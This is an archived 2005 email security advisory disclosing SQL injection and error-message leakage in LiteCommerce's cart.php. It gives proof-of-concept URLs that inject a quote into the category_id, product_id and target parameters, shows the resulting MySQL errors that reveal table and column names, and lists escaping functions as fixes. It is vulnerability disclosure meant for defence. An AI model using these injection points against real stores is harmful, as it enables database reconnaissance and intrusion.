This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C53B05.B7FB4460 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. = Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: LiteCommerce Sql injection and reveling errors vulnerability Date: 07/04/2005 Vendor: LiteCommerce Vendor Website: http://www.litecommerce.com Summary: LiteCommerce Sql injection and reveling errors vulnerability Proof of Concept Exploits:=20 http://localhost/test/cart.php?target=3D'PHP_SCRIPT_EXPOSUREPHP_SCRIPT_EX= POSURE http://localhost/test/cart.php?target=3Dcategory&category_id=3D'SQL_INJEC= TION SQL INJECTION 1064: You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near 'SQL_INJECTION' AND 1 ORDER BY order_by, name' at line 1 in SELECT = category_id,image_width,image_height,name,description,meta_tags,enable = d,views_stats,order_by,membership,threshold_bestsellers,parent,image_t = ype FROM xlite_categories WHERE parent=3D''SQL_INJECTION' AND 1 ORDER BY = order_by, name This reveals coloumn, table information thus is very high risk and easy = to exploit http://localhost/test/cart.php?target=3Dproduct&product_id=3D'SQL_INJECTI= ON&category_id=3D246 SQL INJECTION 1064: You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near 'SQL_INJECTION' AND enabled=3D1' at line 1 in SELECT = inventory_id,amount,low_avail_limit,enabled,order_by FROM = xlite_inventories WHERE inventory_id=3D''SQL_INJECTION' AND enabled=3D1 Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = my soon to come out book on Secure coding with php. ------=_NextPart_000_0005_01C53B05.B7FB4460 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable